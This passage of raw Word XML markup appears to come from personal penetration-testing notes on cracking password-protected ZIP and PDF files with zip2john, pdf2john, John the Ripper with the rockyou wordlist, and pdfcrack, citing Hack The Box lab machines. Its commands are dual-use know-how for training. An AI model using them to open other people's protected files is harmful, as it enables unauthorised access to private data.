          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zip2john </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tool which is made for this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zip2john protected.zip &gt; ziphash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DDC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">protected.zip is the zip file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DDD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ziphash.txt is the name of the file you want to save the hashes to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will provide some other meta data blob, but once you put it into john, john will know what to do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way is to get the output to terminal using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zip2john protected.zip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="330200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="457" name="image437.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image437.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId615"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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1DE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But then when you want to put it in a file like ziphash.txt, you only include the text inside of the $ sign. So here, it would be:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4891088" cy="321370"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="110" name="image109.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image109.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId616"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4891088" cy="321370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, as you can see, it's much easier to just use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zip2john protected.zip &gt; ziphash.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which will include some other blobs besides the desired string, but it will work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john -wordlist=/usr/share/wordlists/rockyou.txt ziphash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wordlist might be need two dashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --show ziphash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output might be something like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Gungsuh" w:cs="Gungsuh" w:eastAsia="Gungsuh" w:hAnsi="Gungsuh"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">┌──(kali㉿kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">└─$ john --show ziphash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backup.zip:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">741852963</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">::backup.zip:style.css, index.php:backup.zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, you see that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">741852963 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the output, and we have 2 files (style.css and index.php)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DEE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the Ransom HTB:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7z l -slt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">name.zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1085"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This gives you information about the method of encryption and more. It can be seen at the "method" property</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The encryption method we saw was "ZipCrypto Deflate"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The whole process was pretty complicated since it was to access the Root user. You can look at the writeup for the full process of how they did it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h7miwicycep5" w:id="250"/>
      <w:bookmarkEnd w:id="250"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking PDF files with passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId617">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nickel</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DF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pdf2john nameOfFile.pdf &gt; pdf.hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64 pdf.hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1446"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They added the best 64 rules here to add variation to the word list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another tool to use to crack it is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pdfcrack</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pdfcrack -f nameOfFile.pdf -w /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can then view the PDF using evince</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">evince nameOfFile.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E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04">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E05">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1z1q05a37zji" w:id="251"/>
      <w:bookmarkEnd w:id="251"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HashCat and Hashid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
